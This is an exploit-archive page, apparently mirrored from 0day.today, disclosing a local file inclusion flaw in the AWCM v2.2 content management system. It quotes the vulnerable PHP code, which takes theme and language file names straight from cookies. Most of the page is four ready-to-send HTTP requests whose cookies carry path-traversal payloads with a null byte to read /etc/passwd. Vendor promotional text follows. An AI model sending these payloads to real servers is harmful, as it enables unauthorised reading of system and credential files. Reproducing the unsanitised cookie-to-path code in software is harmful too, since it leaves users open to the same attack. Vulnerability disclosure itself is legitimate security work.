Lucene search
+L

AWCM v2.2 final Local File Inclusion Vulnerability

🗓️ 27 Jan 2011 00:00:00Reported by CucuraType 
zdt
 zdt
🔗 0day.today👁 14 Views

AWCM v2.2 final Local File Inclusion Vulnerability, Exploit via Cookie

Code
[+]Exploit Title: [awcm v2.2 final Local File Inclusion]
[+]Date: [26-01-2011]
[+]Author: Cucura , [email protected] ([email protected]_Falc0n)
[+]Software Link: [www.awcm-cms.com]
[+]Version: [v2.2]
[+]CVE : -
[+]Contact: Blackcucura[at]Gmail.com
http://sourceforge.net/projects/awcm/files/
-----------------------------------------------------------------
 
Vuln C0de  in header.php
 
if(isset($_COOKIE['awcm_theme'])) {
    $theme_file = $_COOKIE['awcm_theme'];
} else {
    $theme_file = $mysql_maininfo_row['defult_theme'];
}
 
if(isset($_COOKIE['awcm_lang'])) {
    $lang_file = $_COOKIE['awcm_lang'];
} else {
    $lang_file = $mysql_maininfo_row['defult_language'];
}
 
 
-----------------------------------------------------------------
 
 
[+]Exploit: http://target/awcm/index.php
 
    GET http://192.168.43.173/awcm/index.php HTTP/1.0
    Cookie: awcm_theme=../../../../etc/passwd%00;
 
 
[+]Exploit: http://target/awcm/index.php
 
    GET http://192.168.43.173/awcm/index.php HTTP/1.0
    Cookie: awcm_lang=../../../../etc/passwd%00;
 
 
[+]Exploit: http://target/awcm/header.php
 
    GET http://192.168.43.173/awcm/header.php HTTP/1.0
    Cookie: awcm_lang=../../../../etc/passwd%00;
 
 
[+]Exploit: http://target/awcm/header.php
 
    GET http://192.168.43.173/awcm/header.php HTTP/1.0
    Cookie: awcm_theme=../../../../etc/passwd%00;
 
 
-----------------------------------------------------------------
Greetz : SpeeDr00t, ReDr0se, InsideJ , eidisky [email protected] Falc0n Team



#  0day.today [2018-03-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Jan 2011 00:00Current
7.1High risk
Vulners AI Score7.1
14